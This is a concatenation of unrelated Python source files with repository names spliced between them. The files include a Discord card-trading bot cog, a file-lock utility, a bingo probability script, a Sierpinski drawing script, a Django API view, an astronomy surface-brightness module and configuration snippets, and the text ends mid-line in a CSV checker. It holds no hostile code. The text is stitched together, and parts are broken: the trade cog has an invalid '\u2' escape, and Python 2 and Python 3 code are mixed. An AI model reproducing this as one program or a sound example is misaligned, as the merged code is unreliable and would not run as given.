[Twitter](https://twitter.com/federicobianchy)") duanegtr/legendv3-cogs import discord import os from redbot.core import Config from redbot.core import checks, commands from redbot.core.data_manager import bundled_data_path from redbot.core.utils import chat_formatting from json import load """This is a port of GR8's trade cog with minor modifications. Original cog: https://github.com/Gr8z/Legend-Cogs/tree/master/trade """ # Possible TODO's: # 1. Check if user has sufficient cards to give while searching # for possible traders # 2. Suggest necessary cards for trade give option based on levels. # Max levels can be donated. Also cards that are not used/upgraded # can also be given away. 
cards_filename = "cards.json" consts_filename = "constants.json" token_type = ["legendary", "epic", "rare", "common"] member_settings = { "want" : { "legendary" : [], "epic" : [], "rare" : [], "common" : [], }, "give" : { "legendary" : [], "epic" : [], "rare" : [], "common" : [], }, "token" : { "legendary" : False, "epic" : False, "rare" : False, "common" : False, }, } credits="Bot by Legend Gaming" credits_url = "https://cdn.discordapp.com/emojis/709796075581735012.gif?v=1" class Trade(commands.Cog): """Clash Royale Trading Helper""" def __init__(self, bot): self.bot = bot dir_path = bundled_data_path(self) file_path = os.path.join(dir_path, cards_filename) with open (file_path, 'r') as file: self.cards = load(file) file_path = os.path.join(dir_path, consts_filename) with open (file_path, 'r') as file: self.constants = load(file) self.database = Config.get_conf(self, identifier=7894561230, force_registration=True) self.database.register_member(**member_settings) # init card data self.cards_abbrev = {} for k, v in self.cards.items(): for value in v: self.cards_abbrev[value] = k self.cards_abbrev[k] = k async def cardToRarity(self, name): """Card name to rarity.""" for card in self.constants["cards"]: if name == card["name"]: return card["rarity"] return None async def saveCardWant(self, member, card): rarity = await self.cardToRarity(card) rarity = rarity.lower() async with self.database.member(member).want() as want: if card not in want[rarity]: want[rarity].append(card) async def removeCardWant(self, member, card): rarity = await self.cardToRarity(card) rarity = rarity.lower() async with self.database.member(member).want() as want: if card in want[rarity]: want[rarity].remove(card) async def saveCardGive(self, member, card): rarity = await self.cardToRarity(card) rarity = rarity.lower() async with self.database.member(member).give() as give: if card not in give[rarity]: give[rarity].append(card) async def removeCardGive(self, member, card): rarity = await self.cardToRarity(card) rarity = rarity.lower() async with self.database.member(member).give() as give: give[rarity].remove(card) async def cardInWant(self, member, card): rarity = await self.cardToRarity(card) rarity = rarity.lower() async with self.database.member(member).want() as want: if card in want[rarity]: return True else: return False async def cardInGive(self, member, card): rarity = await self.cardToRarity(card) rarity = rarity.lower() async with self.database.member(member).give() as give: if card in give[rarity]: return True else: return False async def saveToken(self, member, token_name): async with self.database.member(member).token() as token: token[token_name] = True async def removeToken(self, member, token_type): async with self.database.member(member).token() as token: token[token_type] = False async def searchTrades(self, card, guild): rarity = await self.cardToRarity(card) rarity = rarity.lower() trades = {} members = await self.database.all_members() if members: if guild in members: members = members[guild] for player in members: player_data = members[player] trades[player] = [False, False, False] if card in player_data['give'][rarity]: trades[player][0] = True if card in player_data['want'][rarity]: trades[player][1] = True if player_data['token'][rarity]: trades[player][2] = True return trades else: print("Hmm. No guild. That was not supposed to happen! 
") return 0 else: return 0 async def sortTrades(self, server, author, trades): try: author_clan = author.display_name.split("|", 1)[1] except IndexError: author_clan = None token_trades = {} sorted1 = {} sorted2 = {} for player in trades: if player == author.id: continue try: member = server.get_member(player) clan = member.display_name.split("|", 1)[1] except AttributeError: continue except IndexError: clan = None author_clan = None if author_clan == clan: token_trades[player] = trades[player] else: sorted1[player] = trades[player] for player in sorted1: if trades[player][2]: token_trades[player] = trades[player] else: sorted2[player] = trades[player] return { **token_trades, **sorted2} @commands.group(pass_context = True, no_pm=True) async def trade(self, ctx): """ Clash Royale trade commands""" pass @trade.group(name="want") async def trade_want(self, ctx): """Add/Remove cards that you are looking for""" pass @trade_want.command(name="add") async def want_add(self, ctx, *, card): """Add card that you are looking for""" author = ctx.message.author try: card = self.cards_abbrev[card] except KeyError: return await ctx.send("Error, Invalid card") if( await self.cardInGive(author, card) ): await ctx.send("Cannot add {} as it is present in give list.".format(card)) else: await self.saveCardWant(author, card) await ctx.send("You are now looking for {}".format(card)) @trade_want.command(name="remove") async def want_remove(self, ctx, *, card): """Remove card that you are no longer looking for""" author = ctx.message.author try: card = self.cards_abbrev[card] except KeyError: return await ctx.send("Error, Invalid card") await self.removeCardWant(author, card) await ctx.send("You are no longer looking for {}".format(card)) @trade.group(name="give") async def trade_give(self, ctx): """Add/Remove cards that you would like to give away""" pass @trade_give.command(name="add") async def give_add(self, ctx, *, card): """Add card that you want to give away""" author = ctx.message.author try: card = self.cards_abbrev[card] except KeyError: return await ctx.send("Error, Invalid card") if( await self.cardInWant(author, card) ): await ctx.send("Cannot add {} as it is present in want list.".format(card)) else: await self.saveCardGive(author, card) await ctx.send("You are now looking to donate {}".format(card)) @trade_give.command(name="remove") async def give_remove(self, ctx, *, card): """Remove card that you no longer want to give away""" author = ctx.message.author try: card = self.cards_abbrev[card] except KeyError: return await ctx.send("Error, Invalid card") await self.removeCardGive(author, card) await ctx.send("You are no longer looking to give away {}".format(card)) @trade.command(pass_context=True, no_pm=True) async def search(self, ctx, *, card): """Search for trades""" author = ctx.message.author server = ctx.guild try: card = self.cards_abbrev[card] except KeyError: return await ctx.send("Error, Invalid card") trades = await self.searchTrades(card, ctx.guild.id) if(trades == 0): await ctx.send("No data available in the server") return 0 embed = discord.Embed(color=0xFAA61A, description="We found these members who match your card search.") embed.set_author(name="{} Traders".format(card), icon_url="https://i.imgur.com/dtSMITE.jpg") embed.set_thumbnail(url="https://royaleapi.github.io/cr-api-assets/cards/{}.png".format(card.replace(" ", "-").lower())) embed.set_footer(text=credits, icon_url=credits_url) trades = await self.sortTrades(server, author, trades) givers = "\u200b" wanters = "\u200b" for 
player in trades: try: if trades[player][0]: member = server.get_member(player) givers += "• {} ".format(member.display_name) if trades[player][2]: givers += " - Token :white_check_mark: " else: givers += " - Token :x: " givers += "\n" if trades[player][1]: member = server.get_member(player) wanters += "• {} ".format(member.display_name) if trades[player][2]: wanters += " - Token :white_check_mark: " else: wanters += " - Token :x: " wanters += "\n" except AttributeError: pass if len(givers) > 1024: givers = givers[:1000 - len(givers)] + "..." embed.add_field(name="Giving {}".format(card), value=givers + "\n\u200b", inline=False) if len(wanters) > 1024: wanters = wanters[:1000 - len(wanters)] + "..." embed.add_field(name="Want {}".format(card), value=wanters + "\n\u200b", inline=False) await ctx.send(embed=embed) @trade.group(name="token") async def trade_token(self, ctx): """Add/Remove token """ pass @trade_token.command(name="add") async def token_add(self, ctx, token): """Add trade token""" if token in token_type: author = ctx.message.author token = token.lower() try: await self.saveToken(author, token) except KeyError: return await ctx.send("Error, Invalid token") await ctx.send("You now have a {} token".format(token)) else: await ctx.send("Thats not a valid token type") @trade_token.command(name="remove") async def token_remove(self, ctx, token): """Remove trade token""" if token in token_type: author = ctx.message.author token = token.lower() try: await self.removeToken(author, token) except KeyError: return await ctx.send("Error, Invalid token") await ctx.send("You no longer have a {} token".format(token)) else: await ctx.send("Thats not a valid token type") @trade.command() async def info(self, ctx): """Display trade data of user""" member_data = await self.database.member(ctx.author).all() pfp = ctx.author.avatar_url embed = discord.Embed(color=0xFAA61A, description="Trade user info.") embed.set_author(name="{} ".format(ctx.author.display_name), icon_url="https://i.imgur.com/dtSMITE.jpg") embed.set_thumbnail(url=pfp) embed.set_footer(text=credits, icon_url=credits_url) token = "" for rarity, value in member_data['token'].items(): if member_data['token'][rarity]: token += "• " + str(rarity) + " :white_check_mark:" + "\n" else: token += "• " + str(rarity) + " :x:" + "\n" cards_want = "" for rarity, cards in member_data['want'].items(): if member_data['want'][rarity]: cards_want += "• " + chat_formatting.humanize_list(member_data['want'][rarity]) + "\n" cards_give ="" for rarity, cards in member_data['give'].items(): if member_data['give'][rarity]: cards_give += "• " + chat_formatting.humanize_list(member_data['give'][rarity]) + "\n" if len(cards_give) > 1024: cards_give = cards_give[:1000 - len(cards_give)] + "..." if len(cards_want) > 1024: cards_want = cards_want[:1000 - len(cards_want)] + "..." embed.add_field(name="Token : ", value=token + "\n\u2", inline=False) embed.add_field(name="Want : ", value=cards_want + "\n\u200b", inline=False) embed.add_field(name="Give : ", value=cards_give + "\n\u200b", inline=False) await ctx.send(embed=embed) @trade.command() @checks.is_owner() async def deletedata(self, ctx): """ Delete all data of all members""" await self.database.clear_all_members() await ctx.send("Deleted.") zhouyijiaren/commons1000+ # ================================================================================================== # Copyright 2012 Twitter, Inc. 
# -------------------------------------------------------------------------------------------------- # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this work except in compliance with the License. # You may obtain a copy of the License in the LICENSE file, or at: # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ================================================================================================== __author__ = '' import os from . import lock_file, touch, unlock_file class Lock(object): """A co-operative inter-process file lock.""" @staticmethod def unlocked(): """Creates a Lock that is already released.""" return Lock(None) @staticmethod def acquire(path, onwait=None): """Attempts to lock the given path which need not exist ahead of time. By default acquire blocks as long as needed for the lock to be released if already held. If an onwait function is supplied, it will be passed the lock owner's pid when the lock cannot be acquired immediately. In this case the onwait function should return True if it wishes to block on acquisition of the Lock. Otherwise None will be returned as a signal to acquire's caller that the lock failed. """ touch(path) lock_fd = lock_file(path, blocking=False) if not lock_fd: blocking = True with open(path, 'r') as fd: pid = int(fd.read().strip()) if onwait: blocking = onwait(pid) if not blocking: return None lock_fd = lock_file(path, blocking=blocking) lock_fd.truncate(0) lock_fd.write('%d\n' % os.getpid()) lock_fd.flush() return Lock(lock_fd) def __init__(self, lock_fd): self._lock_fd = lock_fd def is_unlocked(self): """Checks whether or not this lock object is currently actively holding a lock.""" return self._lock_fd is None def release(self): """Releases this lock if held and returns True; otherwise, returns False to indicate the lock was already released. """ if self._lock_fd: unlock_file(self._lock_fd, close=True) self._lock_fd = None return True else: return False 0 sal=float(input("Informe o sálario\n")) porcentagem=int(input("Informe a porcentagem de aumento\n")) porcetagem_Do_Aumento=(sal* porcentagem)/100 novo_Salario= sal+ porcetagem_Do_Aumento print("sálario ", novo_Salario )"""" GitHub: https://github.com/4144414D/xmas-bingo Email: Usage: xmas-bingo [-o] xmas-bingo --all xmas-bingo --smart xmas-bingo --version xmas-bingo --help Options: --help Show this screen. --version Show the version. -o, --output Save winning boards to a file. -a, --all Determine results of all numbers of songs. -s, --smart Work out running wins. """ VERSION="0.1" from docopt import docopt def print_board(board): board = '{0:025b}'.format(board) return board[0:5]+'\n'+board[5:10]+'\n'+board[10:15]+'\n'+board[15:20]+'\n'+board[20:25]+'\n' def check_win(board,winning_boards): for winning_board in winning_boards: if board & winning_board == winning_board: return True return False def create_pool(songs): #poor way to determine options. 
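# --- Illustrative sketch (not part of the original source) ---------------
# check_win above tests whether a 25-bit board contains a winning line by
# bitwise containment: a line is complete exactly when
# board & line_mask == line_mask.  A tiny worked example:
top_row      = int('1111100000000000000000000', 2)
full_top_row = int('1111100000001000000000000', 2)   # top row plus centre square
missing_one  = int('1111000000001000000000000', 2)   # one top-row square unset

assert full_top_row & top_row == top_row
assert missing_one & top_row != top_row
# --------------------------------------------------------------------------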
could be faster pool = [] for x in range(16777215+1): #16777215 highest 24 bit number candidate = '{0:024b}'.format(x) if candidate.count('1') == songs: candidate = candidate[:12] + '1' + candidate[12:] #middle always set pool.append(int(candidate,2)) return pool def create_winning_boards(): winning_boards = [] winning_boards.append(int('1111100000000000000000000',2)) winning_boards.append(int('0000011111000000000000000',2)) winning_boards.append(int('0000000000111110000000000',2)) winning_boards.append(int('0000000000000001111100000',2)) winning_boards.append(int('0000000000000000000011111',2)) winning_boards.append(int('1000010000100001000010000',2)) winning_boards.append(int('0100001000010000100001000',2)) winning_boards.append(int('0010000100001000010000100',2)) winning_boards.append(int('0001000010000100001000010',2)) winning_boards.append(int('0000100001000010000100001',2)) winning_boards.append(int('1000001000001000001000001',2)) winning_boards.append(int('0000100010001000100010000',2)) return winning_boards def all(): for songs in range(25): print "Testing results with", print songs, print "song(s)" main(songs,False) print def new_songs(board): results = set() for x in range(25): new_song = int('0'*x + '1' + '0'*(24-x),2) new_board = new_song | board if new_board != board: results.add(new_board) return(results) def smart(): boards = ([int('0000000000001000000000000',2)]) winning_boards = create_winning_boards() song = 0 total_wins = 0 while len(boards) > 0: song += 1 print "Round number", print song print '-'*(13+len(str(song))) loosing_boards = set() candidate_boards = set() wins = 0 for board in boards: #this is slow... candidate_boards = candidate_boards | new_songs(board) for candidate_board in candidate_boards: if check_win(candidate_board,winning_boards): wins += 1 else: loosing_boards.add(candidate_board) print "Round boards: ", print len(boards) print "Winning boards:", print wins print "Loosing boards:", print len(loosing_boards) print "Total wins: ", total_wins += wins print total_wins print "Total winners: ", print (100.0/(total_wins+len(loosing_boards)))*total_wins, print "%" boards = loosing_boards print def main(songs,output): pool = create_pool(songs) winning_boards = create_winning_boards() count = 0 wins = 0 if output: f = open('winning_boards.txt','w') for board in pool: count += 1 if check_win(board,winning_boards): wins += 1 if output: f.write(print_board(board)+'\n') print "Total Count:", print count print "Wins:", print wins print "Winning percentage:", print (100.0/count)*wins, print if output: f.close() if __name__ == '__main__': arguments = docopt(__doc__, version=VERSION) if arguments['--all']: all() elif arguments['--smart']: smart() else: songs = int(arguments['']) main(songs,arguments['--output']) adamreis/rhino-fun """ Simple recursive implementation of a sierpinski triangle algorithm for Rhinocerous 5. Have fun! adamhreis at gmail dot com """ import rhinoscriptsyntax as rs import math def midpoint(p1, p2): return [(p1[0]+p2[0])/2, (p1[1]+p2[1])/2, (p1[2]+p2[2])/2] def next_triangles(t): next = [] mid1 = midpoint(t[0], t[1]) mid2 = midpoint(t[1], t[2]) mid3 = midpoint(t[0], t[2]) next.append((mid2, mid1, t[1])) next.append((mid3, mid2, t[2])) next.append((mid1, mid3, t[0])) return next; def sierpinski(scale, angle, generations): height_prop = math.sin(angle) p1 = [0.,0.,0.] p2 = [float(scale),0.,0.] p3 = [float(scale)/2, height_prop*scale,0.] 
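# The three vertices above define the outer triangle: the apex height is
# sin(angle) * scale, so the default angle of pi/3 yields an equilateral
# triangle with side length `scale`. Each generation, next_triangles()
# replaces a triangle by the three corner triangles built from its side
# midpoints, and _sierpinski() draws every triangle's edges before recursing,
# which is what produces the Sierpinski gasket.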
_sierpinski([(p1, p2, p3)], 0, generations) def _sierpinski(triangles, current_generation, max_generation): if current_generation >= max_generation: return new_triangles = [] for t in triangles: rs.AddLine(t[0],t[1]) rs.AddLine(t[1],t[2]) rs.AddLine(t[0],t[2]) new_triangles.extend(next_triangles(t)) _sierpinski(new_triangles, current_generation+1, max_generation) if __name__ == '__main__': side_len = float(raw_input('Outer side length (defaults to 4): ') or 4) angle = float(raw_input('Angle (in radians, defaults to pi/3): ') or math.pi/3) generations = int(raw_input('Number of generations (defaults to 9): ') or 9) sierpinski(side_len, angle, generations)from django.shortcuts import render from rest_framework.views import APIView from rest_framework.response import Response from .models import Items class ItemsView(APIView): def get(self,request): if 'name' in request.GET: data=Items.objects.filter(name=request.GET['name']).values('name','price').first() else: data=Items.objects.all().values('name','price') return Response({"result":data}, status=200) def post(self,request): data = request.data print(data) item_obj = Items.objects.create(name=data['name'],price=data['price']) return Response({"message":"created"},status=202) # Create your views here. """ Module defining source surface-brightness distributions. ---- .. include license and copyright .. include:: ../include/copy.rst ---- .. include common links, assuming primary doc root is up one directory .. include:: ../include/links.rst """ import warnings import numpy from scipy import signal, special, interpolate from astropy.modeling import functional_models from ..util.frame import SemiMajorAxisCoo # TODO: Need to learn how to use abstract classes! Inherit from # numpy.ndarray? class Source: """ This is an abstract class and should not be instantiated on it's own! Attributes: x (vector): 1D vector with x coordinates X (array): 2D map of x coordinates y (vector): 1D vector with y coordinates Y (array): 2D map of y coordinates data (array): Map of the surface brightness distribution sampling (float): Sampling of the square map in arcsec/pixel. size (float): Size of the square map in arcsec. """ def __init__(self): self.x = None self.X = None self.y = None self.Y = None self.data = None self.sampling = None self.size = None def __call__(self, x, y): pass def minimum_sampling(self): pass def minimum_size(self): pass def make_map(self, sampling=None, size=None): """ Generate a square map of the surface-brightness distribution. Object is modified internally with the constructed map saved to :attr:`data`. Args: sampling (:obj:`float`, optional): The size of each pixel in the map, typically in arcsec per pixel. If None, sampling will be set by :func:`minimum_sampling`. size (:obj:`float`, optional): Length of one axis of the *square* map, typically in arcsec. Will be adjusted to ensure an integer number of pixels in the map based on :attr:`sampling`. If None, set by :func:`minimum_size`. 
""" if sampling is None and self.sampling is None: self.sampling = self.minimum_sampling() elif sampling is not None: self.sampling = sampling if size is None and self.size is None: self.size = self.minimum_size() elif size is not None: self.size = size # Set the number of pixels that spans the full size requested pixsize = numpy.ceil(self.size/self.sampling).astype(int) # Force the pixel size to be odd if pixsize % 2 == 0: pixsize += 1 # Adjust the size to be an integer number of pixels _size = pixsize*self.sampling if _size - self.size > 0.1*self.sampling: warnings.warn('Size reset to an integer number of pixels: ' ' {0} -> {1} arcsec'.format(self.size, _size)) self.size = _size self.y = (pixsize-1)*numpy.linspace(-0.5,0.5,pixsize)*self.sampling self.x = self.y.copy()[::-1] # Sample it self.X, self.Y = numpy.meshgrid(self.x, self.y) self.data = self.__call__(self.X, self.Y) def __getitem__(self, s): """Slice the map.""" if self.data is None: raise ValueError('Distribution data is not defined!') return self.data[s] @property def shape(self): """The shape of the current map.""" return () if self.data is None else self.data.shape def reset_map(self): """ Reset mapping attributes for a fresh determination of the sampling, size, and surface-brightness map. This is mainly used for resetting the internals when using the default sampling and size to set the map. To reconstruct the map after calling this method, run :func:`make_map`. This:: self.reset_map() self.make_map() is equivalent to this:: self.make_map(sampling=self.minimum_sampling(), size=self.minimum_size()) """ self.x = None self.X = None self.y = None self.Y = None self.data = None self.sampling = None self.size = None class OnSkyConstant(Source): """ An on-sky constant surface brightness. Args: surfbrightness (scalar-like): The constant surface brightness for the source in linear flux units per square arcsecond. sampling (scalar-like, optional): Sampling of a generated map in arcseconds per pixel. Default is set by :func:`minimum_sampling`. size (scalar-like, optional): Size of the image to generate of the distribution in *arceconds* along one of the axes. The map is square. Default is defined by :func:`minimum_size`. """ def __init__(self, surfbrightness, sampling=None, size=None): # Define internals self.surfbrightness = float(surfbrightness) # Instantiate the functional_models.Gaussian2D object super(OnSkyConstant, self).__init__() # Set the map sampling and size self.sampling = sampling self.size = size # Set the map if requested if sampling is not None or size is not None: self.make_map() def minimum_sampling(self): r""" Return the minimum sampling in arcseconds per pixels. Currently just set to 1. """ # TODO: Allow `Source` to understand when this returns None? return 1. def minimum_size(self): r""" The minimum size that should be used for the distribution map in arcseconds. Currently just set to 3. """ # TODO: Allow `Source` to understand when this returns None? return 3. def __call__(self, x, y): """ Return the surface brightness at a given location. """ return numpy.full_like(x, self.surfbrightness, dtype=float) \ if isinstance(x, numpy.ndarray) else self.surfbrightness class OnSkyGaussian(functional_models.Gaussian2D, Source): """ An on-sky Gaussian distribution. Args: fwhm (scalar-like): The FWHM of the Gaussian in *arcseconds*. center (scalar-like, optional): The coordinates of the Gaussian center in *arcseconds*. ellipticity (scalar-like, optional): The ellipticity (1-b/a) of an elliptical Gaussian distribution. 
position_angle (scalar-like, optional): The position angle for the elliptical Gaussian distribution, defined as the angle from N through E. The coordinate system is defined with positive offsets (in RA) toward the east, meaning lower pixel indices. sampling (scalar-like, optional): Sampling of a generated map in arcseconds per pixel. Default is set by :func:`minimum_sampling`. size (scalar-like, optional): Size of the image to generate of the distribution in *arceconds* along one of the axes. The map is square. Default is defined by :func:`minimum_size`. """ def __init__(self, fwhm, center=None, ellipticity=None, position_angle=None, sampling=None, size=None): # Define internals self.fwhm = float(fwhm) self.ellipticity = 0 if ellipticity is None else ellipticity self.position_angle = 0 if position_angle is None else position_angle sig2fwhm = numpy.sqrt(8*numpy.log(2)) major_sigma = self.fwhm/sig2fwhm minor_sigma = major_sigma * (1-self.ellipticity) # Instantiate the functional_models.Gaussian2D object super(OnSkyGaussian, self).__init__(amplitude=1/(2*major_sigma*minor_sigma*numpy.pi), x_mean=0 if center is None else center[0], y_mean=0 if center is None else center[1], x_stddev=minor_sigma, y_stddev=major_sigma, theta=-numpy.radians(self.position_angle)) # Set the integral to be normalized self.integral = 1.0 # Set the map sampling and size self.sampling = sampling self.size = size # Set the map if requested if sampling is not None or size is not None: self.make_map() def get_integral(self): """Return the analytic integral of the source.""" sig2fwhm = numpy.sqrt(8*numpy.log(2)) major_sigma = self.fwhm/sig2fwhm minor_sigma = major_sigma * (1-self.ellipticity) return self.amplitude*2*numpy.pi*major_sigma*minor_sigma def minimum_sampling(self): r""" Return the minimum sampling in arcseconds per pixels. Currently :math:`{\rm FWHM}/2`. """ return self.fwhm/2. def minimum_size(self): r""" The minimum size that should be used for the distribution map in arcseconds. Currently :math:`2\ {\rm FWHM}`. """ return self.fwhm*2. class OnSkySersic(functional_models.Sersic2D, Source): """ An on-sky Sersic distribution. Args: sb_eff (scalar-like): The surface brightness at 1 effective (half-light) radius. r_eff (scalar-like): The effective (half-light) radius in *arcseconds*. n (scalar-like): The Sersic index. center (scalar-like, optional): The coordinates of the Sersic center in *arcseconds* relative to the image center. ellipticity (scalar-like, optional): The ellipticity (1-b/a) of an elliptical Sersic distribution. position_angle (scalar-like, optional): The position angle for the elliptical Sersic distribution, defined as the angle from N through E. The coordinate system is defined with positive offsets (in RA) toward the east, meaning lower pixel indices. sampling (scalar-like, optional): Sampling of a generated map in arcseconds per pixel. Default is set by :func:`minimum_sampling`. size (scalar-like, optional): Size of the image to generate of the distribution in *arceconds* along one of the axes. The map is square. Default is defined by :func:`minimum_size`. unity_integral (:obj:`bool`, optional): Renormalize the distribution so that the integral is unity. 
""" def __init__(self, sb_eff, r_eff, n, center=None, ellipticity=None, position_angle=None, sampling=None, size=None, unity_integral=False): self.position_angle = 0 if position_angle is None else position_angle super(OnSkySersic, self).__init__(amplitude=sb_eff, r_eff=r_eff, n=n, x_0=0 if center is None else center[0], y_0=0 if center is None else center[1], ellip=ellipticity, theta=numpy.radians(90-self.position_angle)) self.semi = SemiMajorAxisCoo(xc=self.x_0.value, yc=self.y_0.value, pa=self.position_angle, ell=self.ellip.value) self.bn = None self.integral = self.get_integral() if unity_integral: self.amplitude /= self.integral self.integral = self.get_integral() # Set the map sampling and size self.sampling = sampling self.size = size # Set the map if requested if sampling is not None or size is not None: self.make_map() def get_integral(self): """ The analytic integral of the Sersic profile projected on the sky. """ # Note the (1-ellipticity) factor. self.bn = special.gammaincinv(2. * self.n, 0.5) return 2 * numpy.pi * self.n * numpy.exp(self.bn) * self.amplitude \ * numpy.square(self.r_eff) * (1-self.ellip) \ * special.gamma(2*self.n) * numpy.power(self.bn, -2*self.n) def minimum_sampling(self): r""" Return the minimum sampling in arcseconds per pixels. Currently :math:`R_{\rm eff}/3`. """ return self.r_eff/3. def minimum_size(self): r""" The minimum size that should be used for the distribution map in arcseconds. Currently :math:`3\ R_{\rm eff}`. """ return self.r_eff*3 # TODO: Add an input image distribution #class OnSkyImage: # def __init__(self, fitsfile): # TODO: Add a Moffat distribution class OnSkySource(Source): """ Container class for an on-sky source convolved with the seeing disk. Unlike the other :class:`Source` objects, this requires a map to work. Args: seeing (:obj:`float`, :class:`Source`): The FWHM of a Gaussian seeing distribution in arcseconds or an object used to define the seeing kernel directly. If a float is provided, the sampling of the Gaussian seeing kernel is set by :func:`OnSkyGaussian.minimum_sampling` unless adjusted by the intrinsic source object or the ``sampling`` keyword. If a :class:`Source` object, the object is used to generate a map of the source surface brightness distribution. The integral of the seeing kernel should be unity! intrinsic (:obj:`float`, :class:`Source`): The intrinsic surface brightness distribution of the source. Can be the total flux of a point source (in, e.g., 10^-17 erg/s/cm^2/angstrom) or an object. If a :class:`Source` object, the object is used to generate a map of the source surface-brightness distribution. sampling (scalar-like, optional): Sampling of a generated map in arcseconds per pixel. Default is set by :func:`minimum_sampling`. size (scalar-like, optional): Size of the image to generate of the distribution in *arceconds* along one of the axes. The map is square. Default is defined by :func:`minimum_size`. """ def __init__(self, seeing, intrinsic, sampling=None, size=None): # The seeing kernel self.seeing = OnSkyGaussian(seeing) if isinstance(seeing, float) else seeing # TODO: Make sure seeing object has unity integral! # The intrinsic source distribution self.intrinsic = intrinsic # Get the sampling self.sampling = self.minimum_sampling() if sampling is None else sampling self.size = self.minimum_size() if size is None else size # Make the map self.interp = None self.make_map() def minimum_sampling(self): r""" Return the minimum sampling in arcseconds per pixels. 
This is determined by the minimum of the seeing disk sampling (:attr:`seeing`) and the sampling for the intrinsic distribution (if the latter is defined). """ # Sampling in arcsec / pixel sampling = self.seeing.minimum_sampling() try: # Try using `intrinsic` as an object sampling = min(self.intrinsic.minimum_sampling(), sampling) except AttributeError: pass return sampling def minimum_size(self): """ Return the minimum size of the rendered source map in arcseconds. This is determined by the maximum of the seeing disk map size (:attr:`seeing`) and the intrinsic source map size (if the latter is defined). """ # Size in arcsec size = self.seeing.minimum_size() try: # Try using `intrinsic` as an object size = max(self.intrinsic.minimum_size(), size) except AttributeError: pass return size def make_map(self, sampling=None, size=None): """ Generate a square map of the source surface-brightness distribution. Object is modified internally with the constructed map saved to :attr:`data`. Args: sampling (:obj:`float`, optional): The size of each pixel in the map in arcsec per pixel. If None, sampling will be set by :func:`minimum_sampling`. size (:obj:`float`, optional): Length of one axis of the *square* map in arcsec. Will be adjusted to ensure an integer number of pixels in the map based on :attr:`sampling`. If None, set by :func:`minimum_size`. """ if sampling is None and self.sampling is None: self.sampling = self.minimum_sampling() elif sampling is not None: self.sampling = sampling if size is None and self.size is None: self.size = self.minimum_size() elif size is not None: self.size = size # Build the on-sky source distribution self.seeing.make_map(sampling=self.sampling, size=self.size) self.x = self.seeing.x self.X = self.seeing.X self.y = self.seeing.y self.Y = self.seeing.Y try: # Construct the intrinsic map of the source self.intrinsic.make_map(sampling=self.sampling, size=self.size) # Convolve with the seeing distribution, conserving the # integral of the intrinsic source self.data = signal.fftconvolve(self.intrinsic.data, self.seeing.data * numpy.square(self.sampling), mode='same') except AttributeError: # Renormalize the unity-integral seeing kernal for to # represent a point source self.data = self.intrinsic*self.seeing.data # Get the integral try: # After convolving with the seeing kernel, the total # integral should be the same, up to some tolerance self.integral = self.intrinsic.integral tolerance = 1e-3 diff = numpy.absolute(self.integral - numpy.square(self.sampling)*numpy.sum(self.data)) if diff > tolerance: warnings.warn('Map and analytic integrals are discrepant by {0} ({1} %)'.format( diff, 100*diff/self.integral)) except AttributeError: self.integral = numpy.square(self.sampling) * numpy.sum(self.data) # Prep for interpolation self.interp = interpolate.interp2d(self.x, self.y, self.data, bounds_error=True) # self.interp = interpolate.RectBivariateSpline(self.x, self.y, self.data) def __call__(self, x, y): """ Sample the source. This interpolates the pre-calculated source at the requested coordinate. A `ValueError` will be thrown (see `scipy.interpolate.interp2d`_) if the coordinate is outside the bounds of the calculated map. Args: x (:obj:`float`): The position in arcsec relative to the field center. Positive x is toward the East (positive RA, smaller pixel number). y (:obj:`float`): The position in arcsec relative to the field center. Positive x is toward the North (larger pixel number). Returns: :obj:`float`: The surface brightness at (x,y). 
""" return self.interp(x,y) # Generated by Django 3.0.4 on 2020-03-16 06:59 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('OfficeApp', '0010_episode_running_time'), ] operations = [ migrations.RemoveField( model_name='quote', name='season', ), ] import collections ## Set the experiments taht are going to be used to compute the plot list_of_experiments = ['experiment_64.yaml', 'experiment_67.yaml', 'experiment_68.yaml'] # Set the output validation and driving data # that is going to be read from each of the experiments # The plots are made correlating prediction (offline) with driving (online). # With this the user must define the pairs that are going to be correlated. # The pairs are in the form ValidationDataset: driving benchmark. The # validation dataset must exist on the COIL_DATASET_PATH data_params = {'control': '_auto', 'root_path': '_logs', 'validation_driving_pairs': {'Town01W1': 'ECCVTrainingSuite_Town01', 'Town01W1Noise': 'ECCVTrainingSuite_Town01', 'Town02W14': 'ECCVGeneralizationSuite_Town02', 'Town02W14Noise': 'ECCVGeneralizationSuite_Town02'}, } # There is not data filter data_filter = {} # The parameters processed that are going to be used for after plotting processing_params = {'Success rate': {'metric': 'control_success_rate', 'filter': {}, 'params': {}}, 'Steering absolute error': {'metric': 'steering_error', 'filter': data_filter, 'params': {}}, 'step': {'metric': 'step', 'filter': {}, 'params': {}}, 'town_id': {'metric': 'id', 'filter': {}, 'params': {}}, 'exp': {'metric': 'experiment', 'filter': {}, 'params': {}} } plot_params = collections.OrderedDict() #### Definition of the plots that are going to be made plot_params['ctrl_vs_steer_50'] = {'print': True, 'x': {'data': 'Steering absolute error', 'log': True}, 'y': {'data': 'Success rate', 'log': False}, 'size': {'data': 'step'}, 'color': {'data': 'town_id'}, 'plot_best_n_percent': 50 } ChengyuanSha/LGPWeb0 import pandas as pd import numpy as np csv_file_name = 'sample_alzheimer_vs_normal_data.csv' # change your file name here def check_csv_file(csv_file_name): try: df = pd.read_csv(csv_file_name) if 'category' not in df: print("Error. Please name your class column 'category' ") names = df.columns[1:].values if 'category' in names: print("Error. 
